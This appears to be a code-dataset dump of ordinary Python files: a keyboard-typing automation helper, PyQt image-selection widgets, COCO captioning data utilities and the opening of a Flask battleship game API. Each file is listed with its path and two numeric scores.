time.sleep(random.random()*10.0/wpm)
if enter:
keyboard.press(Key.enter)
keyboard.release(Key.enter)
# Display: Print the entire line to the screen without delay.
def display(line: str, keyboard, prefix: str='#', enter: bool=True, init: int=1) -> None:
time.sleep(init)
keyboard.type(f'{prefix} {line}')
if enter:
keyboard.press(Key.enter)
keyboard.release(Key.enter)
# Pause: Pause for specified seconds
def pause(t: float=1):
time.sleep(t)
# Pause until...
def wait(continue_key=Key.enter):
click.echo(
click.style(f'Paused. Press "{continue_key}" to continue.', blink=True, bold=True))
with Listener(on_press=lambda key: key != continue_key) as listener:
listener.join()
click.echo(
click.style('Unpaused.', bold=True))
click.clear()
# Clear: Clear the screen
def clear(keyboard):
keyboard.press(Key.ctrl_l)
keyboard.press('l')
keyboard.release('l')
keyboard.release(Key.ctrl_l)
# Function to listen for a string of letters.
def trigger(word:str, continue_key=Key.enter) -> bool:
# Key sequence to listen for...
keys = []
for letter in word:
keys.append(letter)
keys.append(continue_key)
trigger_obj = Trigger(keys)
with Listener(on_press=trigger_obj.check) as listener:
listener.join()
return True | 0.438304 | 0.112356 |
import logging
from typing import Optional, Tuple
from wiki_music.gui_lib.qt_importer import (
QBuffer, QByteArray, QEvent, QImage, QIODevice, QLabel, QPixmap, QPoint,
QRect, QRubberBand, QSize, QSizePolicy, QStyleFactory, Qt, Signal)
logging.getLogger(__name__)
__all__ = ["ResizablePixmap", "SelectablePixmap"]
class _ResizableRubberBand(QRubberBand):
"""Reimplements QRubberBand so its aspect ratio can be set.
Atttributes
-----------
aspect_ratio: Tuple[int, int]
the aspect ratio that the rubberband is forcet to obey
"""
aspect_ratio: Optional[float]
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.aspect_ratio = None
def resizeEvent(self, event: QEvent):
"""Reimplements resizeEvent with forced aspect ratio.
Parameters
----------
event: QEvent
the event that triggered this method
"""
if self.aspect_ratio:
size = QSize(*self.aspect_ratio)
size.scale(self.size(), Qt.KeepAspectRatio)
self.resize(size)
def set_aspect_ratio(self, ratio: float):
"""Sets forced aspect ratio for rubberband.
Parameters
----------
ratio: float
aspect ratio value, one float number
"""
self.aspect_ratio = ratio
self.resizeEvent(None)
class ResizablePixmap(QLabel):
"""Picture that can be arbitrarilly resized while keeping its aspect ratio.
Parameters
----------
bytes_image_edit: bytes
image that is displayed
"""
bytes_image_edit: bytes
def __init__(self, bytes_image: bytes, stretch: bool = True) -> None:
QLabel.__init__(self)
if stretch:
self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
else:
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Ignored)
self.setAlignment(Qt.AlignCenter)
self.setStyleSheet("background-color: #ffffff;")
self.update_pixmap(bytes_image)
def update_pixmap(self, bytes_image: bytes):
"""Changes displayed image for a new one.
Parameters
----------
bytes_image: bytes
new image to display in bytes format
"""
self.bytes_image_edit = bytes_image
self.current_pixmap = self._bytes2pixmap(bytes_image)
#self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.scale()
def scale(self, fromResize: bool = False):
"""Handle picture scaling.
Parameters
----------
fromResize: bool
special handling if this method was called after resize, but only
in subclasses
"""
# use a single central method for scaling; there's no need to call it
# upon creation and also resize() won't work anyway in a layout
self.setPixmap(self.current_pixmap.scaled(self.width(), self.height(),
Qt.KeepAspectRatio,
Qt.SmoothTransformation))
def resizeEvent(self, event: QEvent):
"""Reimplement behaviour on resize with scaling enabled.
Parameters
----------
event: QEvent
the event that triggered this method
"""
super(ResizablePixmap, self).resizeEvent(event)
self.scale(fromResize=True)
@staticmethod
def _bytes2pixmap(raw_image: bytes) -> QPixmap:
"""Convert bytes image to `QPixmap`.
Parameters
----------
raw_image: bytes
bytes image to be converted
Returns
-------
QPixmap
image as Qt QPixmap
"""
image = QImage()
image.loadFromData(raw_image)
return QPixmap(image)
@staticmethod
def _pixmap2bytes(pixmap: QPixmap) -> bytes:
"""Convert `QPixmap` to bytes image.
Parameters
----------
pixmap: QPixmap
Qt QPixmap to be converted
Returns
-------
bytes
bytes image
"""
byte_array = QByteArray()
buffer = QBuffer(byte_array)
buffer.open(QIODevice.WriteOnly)
pixmap.save(buffer, 'PNG')
return byte_array.data()
@property
def image_dims(self) -> Tuple[int, int]:
"""Actual image dimensions.
Returns
-------
Tuple[int, int]
image width and height
"""
return self.width(), self.height()
class SelectablePixmap(ResizablePixmap):
"""Pixmap whose part can be selected with selection rubberband.
Warnings
--------
The solution is copied from stackoverflow and is not yet
properly documented.
References
----------
https://stackoverflow.com/questions/58053735/get-real-size-of-qpixmap-in-qlabel
Attributes
----------
currentQRubberBand: Optional[_ResizableRubberBand]
holds reference to current rubberband
rubberBandOffset: Optional[QPoint]
rubberband upper left corner offset from the point where the mouse was
clicked before dragging start
moveDirection: Optional[Qt.Orientation]
direction in which rubberband edge is dragged when resizing
rubberBandRatio: Optional[float]
forced aspect ratio of rubberband
pixmapRect: QRect
rectangle defining the pixmap borders
selectionActive: Signal(bool)
signal emited whenerver new rubberband selection is created
destroyed
"""
currentQRubberBand: Optional[_ResizableRubberBand]
rubberBandOffset: Optional[QPoint]
moveDirection: Optional[Qt.Orientation]
rubberBandRatio: Optional[float]
pixmapRect: QRect
selectionActive: Signal = Signal(bool)
def __init__(self, bytes_image: bytes) -> None:
super().__init__(bytes_image)
# activate mouse tracking to change cursor on rubberband hover
self.setMouseTracking(True)
self.currentQRubberBand = None
self.rubberBandOffset = None
self.moveDirection = 0
self.rubberBandRatio = None
def set_aspect_ratio(self, ratio: Optional[float]):
"""Sets aspect ratio for rubberband.
Parameters
----------
ratio: float
desired aspect ratio
"""
self.rubberBandRatio = ratio
self._update_ratio()
def _update_ratio(self):
"""If rubberband is created updates its aspect ratio."""
if self.currentQRubberBand:
self.currentQRubberBand.set_aspect_ratio(self.rubberBandRatio)
def create_selection(self, pos: QPoint):
"""Create new rubberband selection.
Parameters
----------
pos: QPoint
clicked position
Note
----
If old selection existed new is created only if mouse click happens
outside of that selection. Othervise the current selection is moved.
"""
if self.currentQRubberBand:
self.cancel_selection()
self.currentQRubberBand = _ResizableRubberBand(QRubberBand.Rectangle,
self)
self.currentQRubberBand.setStyle(QStyleFactory.create("Fusion"))
self.currentQRubberBand.setGeometry(pos.x(), pos.y(), 1, 1)
self.currentQRubberBand.show()
self.originQPoint = pos
self.currentQRubberBand.installEventFilter(self)
def cancel_selection(self):
"""Cancels the current selection and destroys the rubberband."""
self.currentQRubberBand.hide()
self.currentQRubberBand.deleteLater()
self.currentQRubberBand = None
self.originQPoint = None
self.selectionActive.emit(False)
def scale(self, fromResize: bool = False):
"""Handle picture and selection scaling caused by window resize.
Parameters
----------
fromResize: bool
tells the type if event that requested scaling
"""
if fromResize and self.currentQRubberBand:
# keep data for rubber resizing, before scaling
oldPixmapRect = self.pixmap().rect()
oldOrigin = (self.currentQRubberBand.pos() -
self.pixmapRect.topLeft())
super(SelectablePixmap, self).scale()
# assuming that you always align the image in the center,
# get the current pixmap rect and move
# the rectangle center to the current geometry
self.pixmapRect = self.pixmap().rect()
self.pixmapRect.moveCenter(self.rect().center())
if fromResize and self.currentQRubberBand:
# find the new size ratio based on the previous
xRatio = self.pixmapRect.width() / oldPixmapRect.width()
yRatio = self.pixmapRect.height() / oldPixmapRect.height()
# create a new geometry using 0-rounding for improved accuracy
self.currentQRubberBand.setGeometry(
round(oldOrigin.x() * xRatio, 0) + self.pixmapRect.x(),
round(oldOrigin.y() * yRatio + self.pixmapRect.y(), 0),
round(self.currentQRubberBand.width() * xRatio, 0),
round(self.currentQRubberBand.height() * yRatio, 0))
def updateMargins(self):
"""Update picture margins formouse event tracking.
Whenever the rubberband rectangle geometry changes, create virtual
rectangles for corners and sides to ease up mouse event checking.
"""
rect = self.currentQRubberBand.geometry()
self.rubberTopLeft = QRect(rect.topLeft(),
QSize(8, 8))
self.rubberTopRight = QRect(rect.topRight(),
QSize(-8, 8)).normalized()
self.rubberBottomRight = QRect(rect.bottomRight(),
QSize(-8, -8)).normalized()
self.rubberBottomLeft = QRect(rect.bottomLeft(),
QSize(8, -8)).normalized()
self.rubberLeft = QRect(self.rubberTopLeft.bottomLeft(),
self.rubberBottomLeft.topRight())
self.rubberTop = QRect(self.rubberTopLeft.topRight(),
self.rubberTopRight.bottomLeft())
self.rubberRight = QRect(self.rubberTopRight.bottomLeft(),
self.rubberBottomRight.topRight())
self.rubberBottom = QRect(self.rubberBottomLeft.topRight(),
self.rubberBottomRight.bottomLeft())
self.rubberInnerRect = QRect(self.rubberTop.bottomLeft(),
self.rubberBottom.topRight())
def eventFilter(self, source, event: QEvent):
"""Filteres GUI events to call special method on resize event.
Parameters
----------
source
source that caused the event
event: QEvent
type of event
Returns
-------
Callable
result of the superclass eventFilter
"""
if event.type() in (QEvent.Resize, QEvent.Move):
self.updateMargins()
return super(SelectablePixmap, self).eventFilter(source, event)
def mousePressEvent(self, event: QEvent):
"""Handles left mouse button cliks.
If the clicked position is inside the current selection than that
selection is moved. If it is outside tahn a new selection is created.
If the click is in selection margins than the picture is resized by
dragging one of the edges.
Parameters
----------
event: QEvent
calling event
See also
--------
:meth:`SelectablePixmap.updateMargins`
method responsible for creating margins and keeping them up to date
"""
pos = event.pos()
if (not self.currentQRubberBand or
pos not in self.currentQRubberBand.geometry()): # noqa E129
if pos not in self.pixmapRect:
self.originQPoint = None
return
self.create_selection(pos)
self.selectionActive.emit(True)
self._update_ratio()
elif pos in self.rubberTopLeft:
self.originQPoint = (
self.currentQRubberBand.geometry().bottomRight())
elif pos in self.rubberTopRight:
self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
elif pos in self.rubberBottomRight:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
elif pos in self.rubberBottomLeft:
self.originQPoint = self.currentQRubberBand.geometry().topRight()
elif pos in self.rubberTop:
self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
self.moveDirection = Qt.Vertical
elif pos in self.rubberBottom:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
self.moveDirection = Qt.Vertical
elif pos in self.rubberLeft:
self.originQPoint = self.currentQRubberBand.geometry().topRight()
self.moveDirection = Qt.Horizontal
elif pos in self.rubberRight:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
self.moveDirection = Qt.Horizontal
else:
self.rubberBandOffset = pos - self.currentQRubberBand.pos()
def mouseMoveEvent(self, event: QEvent):
"""Handles mouse movement events concerning the rubberband.
The movement after mouse button is clicked and held can cause
two actions. If the click occured in the margins than the selection is
resized by dragging the edge. If it is inside the selection rectangle
then the selection rubberband is moved by drgging.
Parameters
----------
event: QEvent
the calling event
"""
pos = event.pos()
if event.buttons() == Qt.NoButton and self.currentQRubberBand:
if pos in self.rubberTopLeft or pos in self.rubberBottomRight:
self.setCursor(Qt.SizeFDiagCursor)
elif pos in self.rubberTopRight or pos in self.rubberBottomLeft:
self.setCursor(Qt.SizeBDiagCursor)
elif pos in self.rubberLeft or pos in self.rubberRight:
self.setCursor(Qt.SizeHorCursor)
elif pos in self.rubberTop or pos in self.rubberBottom:
self.setCursor(Qt.SizeVerCursor)
elif pos in self.rubberInnerRect:
self.setCursor(Qt.SizeAllCursor)
else:
self.unsetCursor()
elif event.buttons():
if self.rubberBandOffset and self.currentQRubberBand:
target = pos - self.rubberBandOffset
rect = QRect(target, self.currentQRubberBand.size())
# limit positioning of the selection to the image rectangle
if rect.x() < self.pixmapRect.x():
rect.moveLeft(self.pixmapRect.x())
elif rect.right() > self.pixmapRect.right():
rect.moveRight(self.pixmapRect.right())
if rect.y() < self.pixmapRect.y():
rect.moveTop(self.pixmapRect.y())
elif rect.bottom() > self.pixmapRect.bottom():
rect.moveBottom(self.pixmapRect.bottom())
self.currentQRubberBand.setGeometry(rect)
elif self.originQPoint and self.currentQRubberBand:
if self.moveDirection == Qt.Vertical:
# keep the X fixed to the current right, so that only the
# vertical position is changed
pos.setX(self.currentQRubberBand.geometry().right())
else:
# limit the X to the pixmapRect extent
if pos.x() < self.pixmapRect.x():
pos.setX(self.pixmapRect.x())
elif pos.x() > self.pixmapRect.right():
pos.setX(self.pixmapRect.right())
if self.moveDirection == Qt.Horizontal:
# same as before, but for the Y position
pos.setY(self.currentQRubberBand.geometry().bottom())
else:
# limit the Y to the pixmapRect extent
if pos.y() < self.pixmapRect.y():
pos.setY(self.pixmapRect.y())
elif pos.y() > self.pixmapRect.bottom():
pos.setY(self.pixmapRect.bottom())
rect = QRect(self.originQPoint, pos)
self.currentQRubberBand.setGeometry(rect.normalized())
def mouseReleaseEvent(self, event: QEvent):
"""Handles mouse release events and cleans up the data afterwards.
Resets: rubberBandOffset, originQPoint, moveDirection
"""
self.rubberBandOffset = None
self.originQPoint = None
self.moveDirection = 0 | wiki_music/gui_lib/custom_classes/pictures.py |
import logging
from typing import Optional, Tuple
from wiki_music.gui_lib.qt_importer import (
QBuffer, QByteArray, QEvent, QImage, QIODevice, QLabel, QPixmap, QPoint,
QRect, QRubberBand, QSize, QSizePolicy, QStyleFactory, Qt, Signal)
logging.getLogger(__name__)
__all__ = ["ResizablePixmap", "SelectablePixmap"]
class _ResizableRubberBand(QRubberBand):
"""Reimplements QRubberBand so its aspect ratio can be set.
Atttributes
-----------
aspect_ratio: Tuple[int, int]
the aspect ratio that the rubberband is forcet to obey
"""
aspect_ratio: Optional[float]
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.aspect_ratio = None
def resizeEvent(self, event: QEvent):
"""Reimplements resizeEvent with forced aspect ratio.
Parameters
----------
event: QEvent
the event that triggered this method
"""
if self.aspect_ratio:
size = QSize(*self.aspect_ratio)
size.scale(self.size(), Qt.KeepAspectRatio)
self.resize(size)
def set_aspect_ratio(self, ratio: float):
"""Sets forced aspect ratio for rubberband.
Parameters
----------
ratio: float
aspect ratio value, one float number
"""
self.aspect_ratio = ratio
self.resizeEvent(None)
class ResizablePixmap(QLabel):
"""Picture that can be arbitrarilly resized while keeping its aspect ratio.
Parameters
----------
bytes_image_edit: bytes
image that is displayed
"""
bytes_image_edit: bytes
def __init__(self, bytes_image: bytes, stretch: bool = True) -> None:
QLabel.__init__(self)
if stretch:
self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
else:
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Ignored)
self.setAlignment(Qt.AlignCenter)
self.setStyleSheet("background-color: #ffffff;")
self.update_pixmap(bytes_image)
def update_pixmap(self, bytes_image: bytes):
"""Changes displayed image for a new one.
Parameters
----------
bytes_image: bytes
new image to display in bytes format
"""
self.bytes_image_edit = bytes_image
self.current_pixmap = self._bytes2pixmap(bytes_image)
#self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.scale()
def scale(self, fromResize: bool = False):
"""Handle picture scaling.
Parameters
----------
fromResize: bool
special handling if this method was called after resize, but only
in subclasses
"""
# use a single central method for scaling; there's no need to call it
# upon creation and also resize() won't work anyway in a layout
self.setPixmap(self.current_pixmap.scaled(self.width(), self.height(),
Qt.KeepAspectRatio,
Qt.SmoothTransformation))
def resizeEvent(self, event: QEvent):
"""Reimplement behaviour on resize with scaling enabled.
Parameters
----------
event: QEvent
the event that triggered this method
"""
super(ResizablePixmap, self).resizeEvent(event)
self.scale(fromResize=True)
@staticmethod
def _bytes2pixmap(raw_image: bytes) -> QPixmap:
"""Convert bytes image to `QPixmap`.
Parameters
----------
raw_image: bytes
bytes image to be converted
Returns
-------
QPixmap
image as Qt QPixmap
"""
image = QImage()
image.loadFromData(raw_image)
return QPixmap(image)
@staticmethod
def _pixmap2bytes(pixmap: QPixmap) -> bytes:
"""Convert `QPixmap` to bytes image.
Parameters
----------
pixmap: QPixmap
Qt QPixmap to be converted
Returns
-------
bytes
bytes image
"""
byte_array = QByteArray()
buffer = QBuffer(byte_array)
buffer.open(QIODevice.WriteOnly)
pixmap.save(buffer, 'PNG')
return byte_array.data()
@property
def image_dims(self) -> Tuple[int, int]:
"""Actual image dimensions.
Returns
-------
Tuple[int, int]
image width and height
"""
return self.width(), self.height()
class SelectablePixmap(ResizablePixmap):
"""Pixmap whose part can be selected with selection rubberband.
Warnings
--------
The solution is copied from stackoverflow and is not yet
properly documented.
References
----------
https://stackoverflow.com/questions/58053735/get-real-size-of-qpixmap-in-qlabel
Attributes
----------
currentQRubberBand: Optional[_ResizableRubberBand]
holds reference to current rubberband
rubberBandOffset: Optional[QPoint]
rubberband upper left corner offset from the point where the mouse was
clicked before dragging start
moveDirection: Optional[Qt.Orientation]
direction in which rubberband edge is dragged when resizing
rubberBandRatio: Optional[float]
forced aspect ratio of rubberband
pixmapRect: QRect
rectangle defining the pixmap borders
selectionActive: Signal(bool)
signal emited whenerver new rubberband selection is created
destroyed
"""
currentQRubberBand: Optional[_ResizableRubberBand]
rubberBandOffset: Optional[QPoint]
moveDirection: Optional[Qt.Orientation]
rubberBandRatio: Optional[float]
pixmapRect: QRect
selectionActive: Signal = Signal(bool)
def __init__(self, bytes_image: bytes) -> None:
super().__init__(bytes_image)
# activate mouse tracking to change cursor on rubberband hover
self.setMouseTracking(True)
self.currentQRubberBand = None
self.rubberBandOffset = None
self.moveDirection = 0
self.rubberBandRatio = None
def set_aspect_ratio(self, ratio: Optional[float]):
"""Sets aspect ratio for rubberband.
Parameters
----------
ratio: float
desired aspect ratio
"""
self.rubberBandRatio = ratio
self._update_ratio()
def _update_ratio(self):
"""If rubberband is created updates its aspect ratio."""
if self.currentQRubberBand:
self.currentQRubberBand.set_aspect_ratio(self.rubberBandRatio)
def create_selection(self, pos: QPoint):
"""Create new rubberband selection.
Parameters
----------
pos: QPoint
clicked position
Note
----
If old selection existed new is created only if mouse click happens
outside of that selection. Othervise the current selection is moved.
"""
if self.currentQRubberBand:
self.cancel_selection()
self.currentQRubberBand = _ResizableRubberBand(QRubberBand.Rectangle,
self)
self.currentQRubberBand.setStyle(QStyleFactory.create("Fusion"))
self.currentQRubberBand.setGeometry(pos.x(), pos.y(), 1, 1)
self.currentQRubberBand.show()
self.originQPoint = pos
self.currentQRubberBand.installEventFilter(self)
def cancel_selection(self):
"""Cancels the current selection and destroys the rubberband."""
self.currentQRubberBand.hide()
self.currentQRubberBand.deleteLater()
self.currentQRubberBand = None
self.originQPoint = None
self.selectionActive.emit(False)
def scale(self, fromResize: bool = False):
"""Handle picture and selection scaling caused by window resize.
Parameters
----------
fromResize: bool
tells the type if event that requested scaling
"""
if fromResize and self.currentQRubberBand:
# keep data for rubber resizing, before scaling
oldPixmapRect = self.pixmap().rect()
oldOrigin = (self.currentQRubberBand.pos() -
self.pixmapRect.topLeft())
super(SelectablePixmap, self).scale()
# assuming that you always align the image in the center,
# get the current pixmap rect and move
# the rectangle center to the current geometry
self.pixmapRect = self.pixmap().rect()
self.pixmapRect.moveCenter(self.rect().center())
if fromResize and self.currentQRubberBand:
# find the new size ratio based on the previous
xRatio = self.pixmapRect.width() / oldPixmapRect.width()
yRatio = self.pixmapRect.height() / oldPixmapRect.height()
# create a new geometry using 0-rounding for improved accuracy
self.currentQRubberBand.setGeometry(
round(oldOrigin.x() * xRatio, 0) + self.pixmapRect.x(),
round(oldOrigin.y() * yRatio + self.pixmapRect.y(), 0),
round(self.currentQRubberBand.width() * xRatio, 0),
round(self.currentQRubberBand.height() * yRatio, 0))
def updateMargins(self):
"""Update picture margins formouse event tracking.
Whenever the rubberband rectangle geometry changes, create virtual
rectangles for corners and sides to ease up mouse event checking.
"""
rect = self.currentQRubberBand.geometry()
self.rubberTopLeft = QRect(rect.topLeft(),
QSize(8, 8))
self.rubberTopRight = QRect(rect.topRight(),
QSize(-8, 8)).normalized()
self.rubberBottomRight = QRect(rect.bottomRight(),
QSize(-8, -8)).normalized()
self.rubberBottomLeft = QRect(rect.bottomLeft(),
QSize(8, -8)).normalized()
self.rubberLeft = QRect(self.rubberTopLeft.bottomLeft(),
self.rubberBottomLeft.topRight())
self.rubberTop = QRect(self.rubberTopLeft.topRight(),
self.rubberTopRight.bottomLeft())
self.rubberRight = QRect(self.rubberTopRight.bottomLeft(),
self.rubberBottomRight.topRight())
self.rubberBottom = QRect(self.rubberBottomLeft.topRight(),
self.rubberBottomRight.bottomLeft())
self.rubberInnerRect = QRect(self.rubberTop.bottomLeft(),
self.rubberBottom.topRight())
def eventFilter(self, source, event: QEvent):
"""Filteres GUI events to call special method on resize event.
Parameters
----------
source
source that caused the event
event: QEvent
type of event
Returns
-------
Callable
result of the superclass eventFilter
"""
if event.type() in (QEvent.Resize, QEvent.Move):
self.updateMargins()
return super(SelectablePixmap, self).eventFilter(source, event)
def mousePressEvent(self, event: QEvent):
"""Handles left mouse button cliks.
If the clicked position is inside the current selection than that
selection is moved. If it is outside tahn a new selection is created.
If the click is in selection margins than the picture is resized by
dragging one of the edges.
Parameters
----------
event: QEvent
calling event
See also
--------
:meth:`SelectablePixmap.updateMargins`
method responsible for creating margins and keeping them up to date
"""
pos = event.pos()
if (not self.currentQRubberBand or
pos not in self.currentQRubberBand.geometry()): # noqa E129
if pos not in self.pixmapRect:
self.originQPoint = None
return
self.create_selection(pos)
self.selectionActive.emit(True)
self._update_ratio()
elif pos in self.rubberTopLeft:
self.originQPoint = (
self.currentQRubberBand.geometry().bottomRight())
elif pos in self.rubberTopRight:
self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
elif pos in self.rubberBottomRight:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
elif pos in self.rubberBottomLeft:
self.originQPoint = self.currentQRubberBand.geometry().topRight()
elif pos in self.rubberTop:
self.originQPoint = self.currentQRubberBand.geometry().bottomLeft()
self.moveDirection = Qt.Vertical
elif pos in self.rubberBottom:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
self.moveDirection = Qt.Vertical
elif pos in self.rubberLeft:
self.originQPoint = self.currentQRubberBand.geometry().topRight()
self.moveDirection = Qt.Horizontal
elif pos in self.rubberRight:
self.originQPoint = self.currentQRubberBand.geometry().topLeft()
self.moveDirection = Qt.Horizontal
else:
self.rubberBandOffset = pos - self.currentQRubberBand.pos()
def mouseMoveEvent(self, event: QEvent):
"""Handles mouse movement events concerning the rubberband.
The movement after mouse button is clicked and held can cause
two actions. If the click occured in the margins than the selection is
resized by dragging the edge. If it is inside the selection rectangle
then the selection rubberband is moved by drgging.
Parameters
----------
event: QEvent
the calling event
"""
pos = event.pos()
if event.buttons() == Qt.NoButton and self.currentQRubberBand:
if pos in self.rubberTopLeft or pos in self.rubberBottomRight:
self.setCursor(Qt.SizeFDiagCursor)
elif pos in self.rubberTopRight or pos in self.rubberBottomLeft:
self.setCursor(Qt.SizeBDiagCursor)
elif pos in self.rubberLeft or pos in self.rubberRight:
self.setCursor(Qt.SizeHorCursor)
elif pos in self.rubberTop or pos in self.rubberBottom:
self.setCursor(Qt.SizeVerCursor)
elif pos in self.rubberInnerRect:
self.setCursor(Qt.SizeAllCursor)
else:
self.unsetCursor()
elif event.buttons():
if self.rubberBandOffset and self.currentQRubberBand:
target = pos - self.rubberBandOffset
rect = QRect(target, self.currentQRubberBand.size())
# limit positioning of the selection to the image rectangle
if rect.x() < self.pixmapRect.x():
rect.moveLeft(self.pixmapRect.x())
elif rect.right() > self.pixmapRect.right():
rect.moveRight(self.pixmapRect.right())
if rect.y() < self.pixmapRect.y():
rect.moveTop(self.pixmapRect.y())
elif rect.bottom() > self.pixmapRect.bottom():
rect.moveBottom(self.pixmapRect.bottom())
self.currentQRubberBand.setGeometry(rect)
elif self.originQPoint and self.currentQRubberBand:
if self.moveDirection == Qt.Vertical:
# keep the X fixed to the current right, so that only the
# vertical position is changed
pos.setX(self.currentQRubberBand.geometry().right())
else:
# limit the X to the pixmapRect extent
if pos.x() < self.pixmapRect.x():
pos.setX(self.pixmapRect.x())
elif pos.x() > self.pixmapRect.right():
pos.setX(self.pixmapRect.right())
if self.moveDirection == Qt.Horizontal:
# same as before, but for the Y position
pos.setY(self.currentQRubberBand.geometry().bottom())
else:
# limit the Y to the pixmapRect extent
if pos.y() < self.pixmapRect.y():
pos.setY(self.pixmapRect.y())
elif pos.y() > self.pixmapRect.bottom():
pos.setY(self.pixmapRect.bottom())
rect = QRect(self.originQPoint, pos)
self.currentQRubberBand.setGeometry(rect.normalized())
def mouseReleaseEvent(self, event: QEvent):
"""Handles mouse release events and cleans up the data afterwards.
Resets: rubberBandOffset, originQPoint, moveDirection
"""
self.rubberBandOffset = None
self.originQPoint = None
self.moveDirection = 0 | 0.929444 | 0.373904 |
import cv2
import pickle
import random
import numpy as np
def load_images_data(img_ids, images_data):
filenames = []
captions = []
for img_id in img_ids:
filenames.append(images_data[img_id]['file_name'])
captions.append(images_data[img_id]['captions'])
return (filenames, captions)
def load_coco(input_path, split):
""" Load coco dataset """
with open(input_path, 'rb') as file:
coco_raw = pickle.load(file)
images_data_train = coco_raw['images_data_train']
images_data_val = coco_raw['images_data_val']
# split dataset
img_ids = list(images_data_train.keys())
random.shuffle(img_ids)
img_ids_val = list(images_data_val.keys())[:split]
val_split_diff = split - len(img_ids_val)
if val_split_diff > 0:
for img_id in img_ids[:val_split_diff]:
img_ids_val.append(img_id)
images_data_val[img_id] = images_data_train[img_id]
img_ids_test = img_ids[val_split_diff:split + val_split_diff]
img_ids_train = img_ids[split + val_split_diff:]
# load dataset
train_images, train_captions = load_images_data(img_ids_train, images_data_train) # training dataset
val_images, val_captions = load_images_data(img_ids_val, images_data_val) # validation dataset
test_images, test_captions = load_images_data(img_ids_test, images_data_train) # test dataset
return (img_ids_train, train_images, train_captions), (img_ids_val, val_images, val_captions), (img_ids_test, test_images, test_captions)
def load_image(path, size=None, grayscale=False):
"""
Load the image from the given file-path and resize it
to the given size if not None.
"""
# Load the image using opencv
if not grayscale: # RGB format
image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
else: # grayscale format
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# Resize image if desired.
if not size is None:
image = cv2.resize(image, size)
# Convert image to numpy array and scale pixels so they fall between 0.0 and 1.0
image = np.array(image) / 255.0
# Add 1 extra dimension to grayscale images
if (len(image.shape) == 2):
image = np.expand_dims(image, axis=-1)
return image
def print_progress_bar(iteration, total):
percent = ("{0:.1f}").format(100 * (iteration / float(total)))
filled_length = int(50 * iteration // total)
bar = '█' * filled_length + '-' * (50 - filled_length)
print('\rProgress: |%s| %s%% Complete' % (bar, percent), end = '\r')
# Print New Line on Complete
if iteration == total:
print() | dataset/utils.py | import cv2
import pickle
import random
import numpy as np
def load_images_data(img_ids, images_data):
filenames = []
captions = []
for img_id in img_ids:
filenames.append(images_data[img_id]['file_name'])
captions.append(images_data[img_id]['captions'])
return (filenames, captions)
def load_coco(input_path, split):
""" Load coco dataset """
with open(input_path, 'rb') as file:
coco_raw = pickle.load(file)
images_data_train = coco_raw['images_data_train']
images_data_val = coco_raw['images_data_val']
# split dataset
img_ids = list(images_data_train.keys())
random.shuffle(img_ids)
img_ids_val = list(images_data_val.keys())[:split]
val_split_diff = split - len(img_ids_val)
if val_split_diff > 0:
for img_id in img_ids[:val_split_diff]:
img_ids_val.append(img_id)
images_data_val[img_id] = images_data_train[img_id]
img_ids_test = img_ids[val_split_diff:split + val_split_diff]
img_ids_train = img_ids[split + val_split_diff:]
# load dataset
train_images, train_captions = load_images_data(img_ids_train, images_data_train) # training dataset
val_images, val_captions = load_images_data(img_ids_val, images_data_val) # validation dataset
test_images, test_captions = load_images_data(img_ids_test, images_data_train) # test dataset
return (img_ids_train, train_images, train_captions), (img_ids_val, val_images, val_captions), (img_ids_test, test_images, test_captions)
def load_image(path, size=None, grayscale=False):
"""
Load the image from the given file-path and resize it
to the given size if not None.
"""
# Load the image using opencv
if not grayscale: # RGB format
image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
else: # grayscale format
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# Resize image if desired.
if not size is None:
image = cv2.resize(image, size)
# Convert image to numpy array and scale pixels so they fall between 0.0 and 1.0
image = np.array(image) / 255.0
# Add 1 extra dimension to grayscale images
if (len(image.shape) == 2):
image = np.expand_dims(image, axis=-1)
return image
def print_progress_bar(iteration, total):
percent = ("{0:.1f}").format(100 * (iteration / float(total)))
filled_length = int(50 * iteration // total)
bar = '█' * filled_length + '-' * (50 - filled_length)
print('\rProgress: |%s| %s%% Complete' % (bar, percent), end = '\r')
# Print New Line on Complete
if iteration == total:
print() | 0.586641 | 0.495972 |
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from battleship import db
from battleship.helpers import OK_REQUEST, BAD_REQUEST, CREATED, \
UNAUTHORIZED, \
add_then_commit
from battleship.models import Account, Coords, Game
# Create new flask blueprint
game = Blueprint('game', __name__)
@game.route('/game', methods=['POST'])
@cross_origin()
def create_game():
""" Get or Create Account & Create New Game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Create or get account & create game.
account = Account.get_or_create(request.json['user_name'])
new_game = Game()
# Create relationship & save.
account.games.append(new_game)
add_then_commit(account)
return jsonify({'success': True, 'game_id': new_game.id}), CREATED
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>', methods=['DELETE'])
@cross_origin()
def delete_game(id):
""" Delete game.
Returns:
dict: JSON Success or Error response.
"""
this_game = Game.query.filter_by(id=id).first()
if this_game is not None:
Game.query.filter_by(id=id).delete()
db.session.commit()
return jsonify({'success': True}), OK_REQUEST
else:
return jsonify({'success': False}), BAD_REQUEST
@game.route('/game/<id>/coords', methods=['PUT'])
@cross_origin()
def game_coords(id):
""" Add user or cpu coordinates to new game.
Returns:
dict: JSON Success or Error response.
"""
if 'user_name' in request.json:
# Re-assign request object.
req = request.json
# Gather Account & Game related info.
